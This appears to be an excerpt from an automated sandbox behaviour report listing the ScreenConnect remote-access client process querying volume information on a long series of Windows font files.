                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
